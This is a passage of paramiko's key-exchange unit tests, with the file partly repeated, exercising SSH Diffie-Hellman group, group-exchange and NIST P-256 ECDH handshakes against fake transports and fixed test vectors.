msg.add_mpint(FakeModulusPack.G) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_GROUP, msg) x = ( b"<KEY>" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_REPLY,), transport._expect ) msg = Message() msg.add_string("fake-host-key") msg.add_mpint(69) msg.add_string("fake-sig") msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REPLY, msg) H = b"A265563F2FA87F1A89BF007EE90D58BE2E4A4BD0" self.assertEqual(self.K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual((b"fake-host-key", b"fake-sig"), transport._verify) self.assertTrue(transport._activated) def test_4_gex_old_client(self): transport = FakeTransport() transport.server_mode = False kex = KexGex(transport) kex.start_kex(_test_old_style=True) x = b"1E00000800" self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_GROUP,), transport._expect ) msg = Message() msg.add_mpint(FakeModulusPack.P) msg.add_mpint(FakeModulusPack.G) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_GROUP, msg) x = ( b"20000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D4" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_REPLY,), transport._expect ) msg = Message() msg.add_string("fake-host-key") msg.add_mpint(69) msg.add_string("fake-sig") msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REPLY, msg) H = b"807F87B269EF7AC5EC7E75676808776A27D5864C" self.assertEqual(self.K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual((b"fake-host-key", b"fake-sig"), transport._verify) self.assertTrue(transport._activated) def 
test_5_gex_server(self): transport = FakeTransport() transport.server_mode = True kex = KexGex(transport) kex.start_kex() self.assertEqual( ( paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST, paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST_OLD, ), transport._expect, ) msg = Message() msg.add_int(1024) msg.add_int(2048) msg.add_int(4096) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST, msg) x = ( b"1F0000008100FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF0000000102" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_INIT,), transport._expect ) msg = Message() msg.add_mpint(12345) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_INIT, msg) K = ( 67592995013596137876033460028393339951879041140378510871612128162185209509220726296697886624612526735888348020498716482757677848959420073720160491114319163078862905400020959196386947926388406687288901564192071077389283980347784184487280885335302632305026248574716290537036069329724382811853044654824945750581 ) H = b"CE754197C21BF3452863B4F44D0B3951F12516EF" x = ( b"210000000866616B652D6B6579000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D40000000866616B652D736967" ) self.assertEqual(K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertTrue(transport._activated) def test_6_gex_server_with_old_client(self): transport = FakeTransport() transport.server_mode = True kex = KexGex(transport) kex.start_kex() self.assertEqual( ( 
paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST, paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST_OLD, ), transport._expect, ) msg = Message() msg.add_int(2048) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST_OLD, msg) x = ( b"1F0000008100FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF0000000102" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_INIT,), transport._expect ) msg = Message() msg.add_mpint(12345) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_INIT, msg) K = ( 67592995013596137876033460028393339951879041140378510871612128162185209509220726296697886624612526735888348020498716482757677848959420073720160491114319163078862905400020959196386947926388406687288901564192071077389283980347784184487280885335302632305026248574716290537036069329724382811853044654824945750581 ) H = b"B41A06B2E59043CEFC1AE16EC31F1E2D12EC455B" x = ( b"210000000866616B652D6B6579000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D40000000866616B652D736967" ) self.assertEqual(K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertTrue(transport._activated) def test_7_gex_sha256_client(self): transport = FakeTransport() transport.server_mode = False kex = KexGexSHA256(transport) kex.start_kex() x = b"22000004000000080000002000" self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_GROUP,), transport._expect ) msg = Message() 
msg.add_mpint(FakeModulusPack.P) msg.add_mpint(FakeModulusPack.G) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_GROUP, msg) x = ( b"20000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D4" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_REPLY,), transport._expect ) msg = Message() msg.add_string("fake-host-key") msg.add_mpint(69) msg.add_string("fake-sig") msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REPLY, msg) H = b"AD1A9365A67B4496F05594AD1BF656E3CDA0851289A4C1AFF549FEAE50896DF4" self.assertEqual(self.K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual((b"fake-host-key", b"fake-sig"), transport._verify) self.assertTrue(transport._activated) def test_8_gex_sha256_old_client(self): transport = FakeTransport() transport.server_mode = False kex = KexGexSHA256(transport) kex.start_kex(_test_old_style=True) x = b"1E00000800" self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_GROUP,), transport._expect ) msg = Message() msg.add_mpint(FakeModulusPack.P) msg.add_mpint(FakeModulusPack.G) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_GROUP, msg) x = ( b"20000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D4" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_REPLY,), transport._expect ) msg = Message() msg.add_string("fake-host-key") msg.add_mpint(69) msg.add_string("fake-sig") 
msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REPLY, msg) H = b"518386608B15891AE5237DEE08DCADDE76A0BCEFCE7F6DB3AD66BC41D256DFE5" self.assertEqual(self.K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual((b"fake-host-key", b"fake-sig"), transport._verify) self.assertTrue(transport._activated) def test_9_gex_sha256_server(self): transport = FakeTransport() transport.server_mode = True kex = KexGexSHA256(transport) kex.start_kex() self.assertEqual( ( paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST, paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST_OLD, ), transport._expect, ) msg = Message() msg.add_int(1024) msg.add_int(2048) msg.add_int(4096) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST, msg) x = ( b"1F0000008100FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF0000000102" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_INIT,), transport._expect ) msg = Message() msg.add_mpint(12345) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_INIT, msg) K = ( 67592995013596137876033460028393339951879041140378510871612128162185209509220726296697886624612526735888348020498716482757677848959420073720160491114319163078862905400020959196386947926388406687288901564192071077389283980347784184487280885335302632305026248574716290537036069329724382811853044654824945750581 ) H = b"CCAC0497CF0ABA1DBF55E1A3995D17F4CC31824B0E8D95CDF8A06F169D050D80" x = ( 
b"210000000866616B652D6B6579000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D40000000866616B652D736967" ) self.assertEqual(K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertTrue(transport._activated) def test_10_gex_sha256_server_with_old_client(self): transport = FakeTransport() transport.server_mode = True kex = KexGexSHA256(transport) kex.start_kex() self.assertEqual( ( paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST, paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST_OLD, ), transport._expect, ) msg = Message() msg.add_int(2048) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST_OLD, msg) x = ( b"1F0000008100FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF0000000102" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_INIT,), transport._expect ) msg = Message() msg.add_mpint(12345) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_INIT, msg) K = ( 67592995013596137876033460028393339951879041140378510871612128162185209509220726296697886624612526735888348020498716482757677848959420073720160491114319163078862905400020959196386947926388406687288901564192071077389283980347784184487280885335302632305026248574716290537036069329724382811853044654824945750581 ) H = b"3DDD2AD840AD095E397BA4D0573972DC60F6461FD38A187CACA6615A5BC8ADBB" x = ( 
b"210000000866616B652D6B6579000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D40000000866616B652D736967" ) self.assertEqual(K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertTrue(transport._activated) def test_11_kex_nistp256_client(self): K = ( 91610929826364598472338906427792435253694642563583721654249504912114314269754 ) transport = FakeTransport() transport.server_mode = False kex = KexNistp256(transport) kex.start_kex() self.assertEqual( (paramiko.kex_ecdh_nist._MSG_KEXECDH_REPLY,), transport._expect ) # fake reply msg = Message() msg.add_string("fake-host-key") Q_S = unhexlify( "<KEY>" ) msg.add_string(Q_S) msg.add_string("fake-sig") msg.rewind() kex.parse_next(paramiko.kex_ecdh_nist._MSG_KEXECDH_REPLY, msg) H = b"BAF7CE243A836037EB5D2221420F35C02B9AB6C957FE3BDE3369307B9612570A" self.assertEqual(K, kex.transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual((b"fake-host-key", b"fake-sig"), transport._verify) self.assertTrue(transport._activated) def test_12_kex_nistp256_server(self): K = ( 91610929826364598472338906427792435253694642563583721654249504912114314269754 ) transport = FakeTransport() transport.server_mode = True kex = KexNistp256(transport) kex.start_kex() self.assertEqual( (paramiko.kex_ecdh_nist._MSG_KEXECDH_INIT,), transport._expect ) # fake init msg = Message() Q_C = unhexlify( "043ae159594ba062efa121480e9ef136203fa9ec6b6e1f8723a321c16e62b945f573f3b822258cbcd094b9fa1c125cbfe5f043280893e66863cc0cb4dccbe70210" ) H = b"2EF4957AFD530DD3F05DBEABF68D724FACC060974DA9704F2AEE4C3DE861E7CA" msg.add_string(Q_C) msg.rewind() kex.parse_next(paramiko.kex_ecdh_nist._MSG_KEXECDH_INIT, msg) self.assertEqual(K, transport._K) 
self.assertTrue(transport._activated) self.assertEqual(H, hexlify(transport._H).upper())
# Copyright (C) 2003-2009 <NAME> <<EMAIL>> # # This file is part of paramiko. # # Paramiko is free software; you can redistribute it and/or modify it under the # terms of the GNU Lesser General Public License as published by the Free # Software Foundation; either version 2.1 of the License, or (at your option) # any later version. # # Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY # WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR # A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more # details. # # You should have received a copy of the GNU Lesser General Public License # along with Paramiko; if not, write to the Free Software Foundation, Inc., # 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA. """ Some unit tests for the key exchange protocols. """ from binascii import hexlify, unhexlify import os import unittest from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives.asymmetric import ec import paramiko.util from paramiko.kex_group1 import KexGroup1 from paramiko.kex_gex import KexGex, KexGexSHA256 from paramiko import Message from paramiko.common import byte_chr from paramiko.kex_ecdh_nist import KexNistp256 def dummy_urandom(n): return byte_chr(0xcc) * n def dummy_generate_key_pair(obj): private_key_value = ( 94761803665136558137557783047955027733968423115106677159790289642479432803037 ) public_key_numbers = ( "<KEY>" ) public_key_numbers_obj = ec.EllipticCurvePublicNumbers.from_encoded_point( ec.SECP256R1(), unhexlify(public_key_numbers) ) obj.P = ec.EllipticCurvePrivateNumbers( private_value=private_key_value, public_numbers=public_key_numbers_obj ).private_key(default_backend()) if obj.transport.server_mode: obj.Q_S = ec.EllipticCurvePublicNumbers.from_encoded_point( ec.SECP256R1(), unhexlify(public_key_numbers) ).public_key(default_backend()) return obj.Q_C = ec.EllipticCurvePublicNumbers.from_encoded_point( ec.SECP256R1(), 
unhexlify(public_key_numbers) ).public_key(default_backend()) class FakeKey(object): def __str__(self): return "fake-key" def asbytes(self): return b"fake-key" def sign_ssh_data(self, H): return b"fake-sig" class FakeModulusPack(object): P = ( 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF ) G = 2 def get_modulus(self, min, ask, max): return self.G, self.P class FakeTransport(object): local_version = "SSH-2.0-paramiko_1.0" remote_version = "SSH-2.0-lame" local_kex_init = "local-kex-init" remote_kex_init = "remote-kex-init" def _send_message(self, m): self._message = m def _expect_packet(self, *t): self._expect = t def _set_K_H(self, K, H): self._K = K self._H = H def _verify_key(self, host_key, sig): self._verify = (host_key, sig) def _activate_outbound(self): self._activated = True def _log(self, level, s): pass def get_server_key(self): return FakeKey() def _get_modulus_pack(self): return FakeModulusPack() class KexTest(unittest.TestCase): K = ( 14730343317708716439807310032871972459448364195094179797249681733965528989482751523943515690110179031004049109375612685505881911274101441415545039654102474376472240501616988799699744135291070488314748284283496055223852115360852283821334858541043710301057312858051901453919067023103730011648890038847384890504 ) def setUp(self): self._original_urandom = os.urandom os.urandom = dummy_urandom self._original_generate_key_pair = KexNistp256._generate_key_pair KexNistp256._generate_key_pair = dummy_generate_key_pair def tearDown(self): os.urandom = self._original_urandom KexNistp256._generate_key_pair = self._original_generate_key_pair def test_1_group1_client(self): transport = FakeTransport() transport.server_mode = False kex = KexGroup1(transport) kex.start_kex() x = ( 
b"1E000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D4" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_group1._MSG_KEXDH_REPLY,), transport._expect ) # fake "reply" msg = Message() msg.add_string("fake-host-key") msg.add_mpint(69) msg.add_string("fake-sig") msg.rewind() kex.parse_next(paramiko.kex_group1._MSG_KEXDH_REPLY, msg) H = b"03079780F3D3AD0B3C6DB30C8D21685F367A86D2" self.assertEqual(self.K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual((b"fake-host-key", b"fake-sig"), transport._verify) self.assertTrue(transport._activated) def test_2_group1_server(self): transport = FakeTransport() transport.server_mode = True kex = KexGroup1(transport) kex.start_kex() self.assertEqual( (paramiko.kex_group1._MSG_KEXDH_INIT,), transport._expect ) msg = Message() msg.add_mpint(69) msg.rewind() kex.parse_next(paramiko.kex_group1._MSG_KEXDH_INIT, msg) H = b"B16BF34DD10945EDE84E9C1EF24A14BFDC843389" x = ( b"1F0000000866616B652D6B6579000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB<KEY>8D40000000866616B652D736967" ) self.assertEqual(self.K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertTrue(transport._activated) def test_3_gex_client(self): transport = FakeTransport() transport.server_mode = False kex = KexGex(transport) kex.start_kex() x = b"22000004000000080000002000" self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_GROUP,), transport._expect ) msg = Message() msg.add_mpint(FakeModulusPack.P) msg.add_mpint(FakeModulusPack.G) 
msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_GROUP, msg) x = ( b"<KEY>" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_REPLY,), transport._expect ) msg = Message() msg.add_string("fake-host-key") msg.add_mpint(69) msg.add_string("fake-sig") msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REPLY, msg) H = b"A265563F2FA87F1A89BF007EE90D58BE2E4A4BD0" self.assertEqual(self.K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual((b"fake-host-key", b"fake-sig"), transport._verify) self.assertTrue(transport._activated) def test_4_gex_old_client(self): transport = FakeTransport() transport.server_mode = False kex = KexGex(transport) kex.start_kex(_test_old_style=True) x = b"1E00000800" self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_GROUP,), transport._expect ) msg = Message() msg.add_mpint(FakeModulusPack.P) msg.add_mpint(FakeModulusPack.G) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_GROUP, msg) x = ( b"20000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D4" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_REPLY,), transport._expect ) msg = Message() msg.add_string("fake-host-key") msg.add_mpint(69) msg.add_string("fake-sig") msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REPLY, msg) H = b"807F87B269EF7AC5EC7E75676808776A27D5864C" self.assertEqual(self.K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual((b"fake-host-key", b"fake-sig"), transport._verify) self.assertTrue(transport._activated) def test_5_gex_server(self): transport = 
FakeTransport() transport.server_mode = True kex = KexGex(transport) kex.start_kex() self.assertEqual( ( paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST, paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST_OLD, ), transport._expect, ) msg = Message() msg.add_int(1024) msg.add_int(2048) msg.add_int(4096) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST, msg) x = ( b"1F0000008100FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF0000000102" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_INIT,), transport._expect ) msg = Message() msg.add_mpint(12345) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_INIT, msg) K = ( 67592995013596137876033460028393339951879041140378510871612128162185209509220726296697886624612526735888348020498716482757677848959420073720160491114319163078862905400020959196386947926388406687288901564192071077389283980347784184487280885335302632305026248574716290537036069329724382811853044654824945750581 ) H = b"CE754197C21BF3452863B4F44D0B3951F12516EF" x = ( b"210000000866616B652D6B6579000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D40000000866616B652D736967" ) self.assertEqual(K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertTrue(transport._activated) def test_6_gex_server_with_old_client(self): transport = FakeTransport() transport.server_mode = True kex = KexGex(transport) kex.start_kex() self.assertEqual( ( paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST, 
paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST_OLD, ), transport._expect, ) msg = Message() msg.add_int(2048) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST_OLD, msg) x = ( b"1F0000008100FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF0000000102" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_INIT,), transport._expect ) msg = Message() msg.add_mpint(12345) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_INIT, msg) K = ( 67592995013596137876033460028393339951879041140378510871612128162185209509220726296697886624612526735888348020498716482757677848959420073720160491114319163078862905400020959196386947926388406687288901564192071077389283980347784184487280885335302632305026248574716290537036069329724382811853044654824945750581 ) H = b"B41A06B2E59043CEFC1AE16EC31F1E2D12EC455B" x = ( b"210000000866616B652D6B6579000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D40000000866616B652D736967" ) self.assertEqual(K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertTrue(transport._activated) def test_7_gex_sha256_client(self): transport = FakeTransport() transport.server_mode = False kex = KexGexSHA256(transport) kex.start_kex() x = b"22000004000000080000002000" self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_GROUP,), transport._expect ) msg = Message() msg.add_mpint(FakeModulusPack.P) 
msg.add_mpint(FakeModulusPack.G) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_GROUP, msg) x = ( b"20000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D4" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_REPLY,), transport._expect ) msg = Message() msg.add_string("fake-host-key") msg.add_mpint(69) msg.add_string("fake-sig") msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REPLY, msg) H = b"AD1A9365A67B4496F05594AD1BF656E3CDA0851289A4C1AFF549FEAE50896DF4" self.assertEqual(self.K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual((b"fake-host-key", b"fake-sig"), transport._verify) self.assertTrue(transport._activated) def test_8_gex_sha256_old_client(self): transport = FakeTransport() transport.server_mode = False kex = KexGexSHA256(transport) kex.start_kex(_test_old_style=True) x = b"1E00000800" self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_GROUP,), transport._expect ) msg = Message() msg.add_mpint(FakeModulusPack.P) msg.add_mpint(FakeModulusPack.G) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_GROUP, msg) x = ( b"20000000807E2DDB1743F3487D6545F04F1C8476092FB912B013626AB5BCEB764257D88BBA64243B9F348DF7B41B8C814A995E00299913503456983FFB9178D3CD79EB6D55522418A8ABF65375872E55938AB99A84A0B5FC8A1ECC66A7C3766E7E0F80B7CE2C9225FC2DD683F4764244B72963BBB383F529DCF0C5D17740B8A2ADBE9208D4" ) self.assertEqual(x, hexlify(transport._message.asbytes()).upper()) self.assertEqual( (paramiko.kex_gex._MSG_KEXDH_GEX_REPLY,), transport._expect ) msg = Message() msg.add_string("fake-host-key") msg.add_mpint(69) msg.add_string("fake-sig") msg.rewind() 
kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REPLY, msg) H = b"518386608B15891AE5237DEE08DCADDE76A0BCEFCE7F6DB3AD66BC41D256DFE5" self.assertEqual(self.K, transport._K) self.assertEqual(H, hexlify(transport._H).upper()) self.assertEqual((b"fake-host-key", b"fake-sig"), transport._verify) self.assertTrue(transport._activated) def test_9_gex_sha256_server(self): transport = FakeTransport() transport.server_mode = True kex = KexGexSHA256(transport) kex.start_kex() self.assertEqual( ( paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST, paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST_OLD, ), transport._expect, ) msg = Message() msg.add_int(1024) msg.add_int(2048) msg.add_int(4096) msg.rewind() kex.parse_next(paramiko.kex_gex._MSG_KEXDH_GEX_REQUEST, msg) x = ( 